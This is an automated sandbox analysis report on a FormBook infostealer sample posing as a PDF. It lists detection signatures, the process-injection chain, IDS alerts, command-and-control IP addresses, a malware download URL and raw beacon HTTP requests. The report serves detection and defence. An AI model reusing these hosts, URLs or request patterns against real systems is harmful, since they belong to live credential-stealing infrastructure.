Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC_TR11670000_pdf.exe

Overview

General Information

Sample name:SC_TR11670000_pdf.exe
Analysis ID:1574654
MD5:1ead28dad1fae4a2478c61d096a3f162
SHA1:503a22eb5ae11321abbce439d4548b037281018d
SHA256:62cb069bd0351753a2cca2186257049a8ca4b5eaf3fbc9ef37080d9ec3f58f24
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SC_TR11670000_pdf.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe" MD5: 1EAD28DAD1FAE4A2478C61D096A3F162)
    • svchost.exe (PID: 3264 cmdline: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • oCCZhsVsNwIIN.exe (PID: 2256 cmdline: "C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • recover.exe (PID: 1908 cmdline: "C:\Windows\SysWOW64\recover.exe" MD5: D38B657A068016768CA9F3B5E100B472)
          • oCCZhsVsNwIIN.exe (PID: 5580 cmdline: "C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1360 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ParentImage: C:\Users\user\Desktop\SC_TR11670000_pdf.exe, ParentProcessId: 6840, ParentProcessName: SC_TR11670000_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ProcessId: 3264, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ParentImage: C:\Users\user\Desktop\SC_TR11670000_pdf.exe, ParentProcessId: 6840, ParentProcessName: SC_TR11670000_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SC_TR11670000_pdf.exe", ProcessId: 3264, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-13T13:08:08.290667+010020197142Potentially Bad Traffic192.168.2.44983645.200.148.4580TCP
                2024-12-13T13:08:30.307107+010020197142Potentially Bad Traffic192.168.2.44988645.200.148.4580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-13T13:07:05.530729+010028554641A Network Trojan was detected192.168.2.449737172.67.158.23480TCP
                2024-12-13T13:07:08.252689+010028554641A Network Trojan was detected192.168.2.449738172.67.158.23480TCP
                2024-12-13T13:07:10.908824+010028554641A Network Trojan was detected192.168.2.449740172.67.158.23480TCP
                2024-12-13T13:07:20.468418+010028554641A Network Trojan was detected192.168.2.449768161.97.142.14480TCP
                2024-12-13T13:07:23.138023+010028554641A Network Trojan was detected192.168.2.449774161.97.142.14480TCP
                2024-12-13T13:07:25.936215+010028554641A Network Trojan was detected192.168.2.449780161.97.142.14480TCP
                2024-12-13T13:07:35.326587+010028554641A Network Trojan was detected192.168.2.449802209.74.64.5880TCP
                2024-12-13T13:07:38.014967+010028554641A Network Trojan was detected192.168.2.449813209.74.64.5880TCP
                2024-12-13T13:07:40.722909+010028554641A Network Trojan was detected192.168.2.449819209.74.64.5880TCP
                2024-12-13T13:08:35.450355+010028554641A Network Trojan was detected192.168.2.449946104.21.74.7980TCP
                2024-12-13T13:08:38.122267+010028554641A Network Trojan was detected192.168.2.449953104.21.74.7980TCP
                2024-12-13T13:08:40.780985+010028554641A Network Trojan was detected192.168.2.449959104.21.74.7980TCP
                2024-12-13T13:08:50.698088+010028554641A Network Trojan was detected192.168.2.4499843.33.130.19080TCP
                2024-12-13T13:08:53.357819+010028554641A Network Trojan was detected192.168.2.4499923.33.130.19080TCP
                2024-12-13T13:08:56.049620+010028554641A Network Trojan was detected192.168.2.4499983.33.130.19080TCP
                2024-12-13T13:09:05.300297+010028554641A Network Trojan was detected192.168.2.45002013.248.169.4880TCP
                2024-12-13T13:09:08.375339+010028554641A Network Trojan was detected192.168.2.45002713.248.169.4880TCP
                2024-12-13T13:09:11.032302+010028554641A Network Trojan was detected192.168.2.45002813.248.169.4880TCP
                2024-12-13T13:09:23.555205+010028554641A Network Trojan was detected192.168.2.450030144.76.190.3980TCP
                2024-12-13T13:09:26.191110+010028554641A Network Trojan was detected192.168.2.450031144.76.190.3980TCP
                2024-12-13T13:09:29.106835+010028554641A Network Trojan was detected192.168.2.450032144.76.190.3980TCP
                2024-12-13T13:09:46.998712+010028554641A Network Trojan was detected192.168.2.450034198.251.84.20080TCP
                2024-12-13T13:09:49.662523+010028554641A Network Trojan was detected192.168.2.450035198.251.84.20080TCP
                2024-12-13T13:09:52.307580+010028554641A Network Trojan was detected192.168.2.450036198.251.84.20080TCP
                2024-12-13T13:10:02.206907+010028554641A Network Trojan was detected192.168.2.450038217.160.0.6080TCP
                2024-12-13T13:10:04.777592+010028554641A Network Trojan was detected192.168.2.450039217.160.0.6080TCP
                2024-12-13T13:10:07.610447+010028554641A Network Trojan was detected192.168.2.450040217.160.0.6080TCP
                2024-12-13T13:10:17.022533+010028554641A Network Trojan was detected192.168.2.450042161.97.142.14480TCP
                2024-12-13T13:10:19.888644+010028554641A Network Trojan was detected192.168.2.450043161.97.142.14480TCP
                2024-12-13T13:10:23.366724+010028554641A Network Trojan was detected192.168.2.450044161.97.142.14480TCP
                2024-12-13T13:10:33.107170+010028554641A Network Trojan was detected192.168.2.450046172.67.149.6480TCP
                2024-12-13T13:10:35.778951+010028554641A Network Trojan was detected192.168.2.450047172.67.149.6480TCP
                2024-12-13T13:10:38.435162+010028554641A Network Trojan was detected192.168.2.450048172.67.149.6480TCP
                2024-12-13T13:10:48.113015+010028554641A Network Trojan was detected192.168.2.4500503.33.130.19080TCP
                2024-12-13T13:10:50.763553+010028554641A Network Trojan was detected192.168.2.4500513.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://45.200.148.45/dashboard/xl.exeAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: SC_TR11670000_pdf.exeReversingLabs: Detection: 76%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SC_TR11670000_pdf.exeJoe Sandbox ML: detected
                Source: SC_TR11670000_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: recover.pdb source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oCCZhsVsNwIIN.exe, 00000002.00000000.1840086036.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4204891761.0000000000FBE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SC_TR11670000_pdf.exe, 00000000.00000003.1748508561.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, SC_TR11670000_pdf.exe, 00000000.00000003.1751290311.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1823259781.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923652119.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1825302443.0000000003400000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 00000003.00000003.1923376601.0000000003521000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 00000003.00000003.1925879400.0000000003721000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4205386992.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: recover.pdbGCTL source: svchost.exe, 00000001.00000002.1923423245.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1923449435.0000000003019000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000002.4204509034.0000000001028000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: recover.exe, 00000003.00000002.4205854920.0000000003EFC000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2219879934.0000000024C6C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B44696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B44696
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B4C9C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4C93C FindFirstFileW,FindClose,0_2_00B4C93C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4F200
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4F35D
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4F65E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B43A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B43A2B
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B43D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B43D4E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4BF27
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F8C5C0 FindFirstFileW,FindNextFileW,FindClose,3_2_02F8C5C0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 4x nop then xor eax, eax3_2_02F79DD0
                Source: C:\Windows\SysWOW64\recover.exeCode function: 4x nop then pop edi3_2_02F7E1E7
                Source: C:\Windows\SysWOW64\recover.exeCode function: 4x nop then mov ebx, 00000004h3_2_037D04DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 172.67.158.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 172.67.158.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 172.67.158.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 209.74.64.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49813 -> 209.74.64.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49946 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49959 -> 104.21.74.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49984 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 172.67.149.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 209.74.64.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 172.67.149.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49998 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 172.67.149.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49992 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 217.160.0.60:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.030002128.xyz
                Source: DNS query: www.tlcatlas.xyz
                Source: DNS query: www.030002059.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49836 -> 45.200.148.45:80
                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49886 -> 45.200.148.45:80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.45
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B525E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B525E2
                Source: global trafficHTTP traffic detected: GET /jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.idsmart.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /90oi/?9B_ppt=WdGxuHz/ABXbnxDuMcWeaiAtNv6zbYEnDSFRQwgnlI3l3VbPFG0OHzktVpkkqW+LG4OUxeltpIvdJ1ISlR18S3Wjl2Tf6Ort1F9q8CbBD/86Ywb40YjbYcY=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.sortcouponspot.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
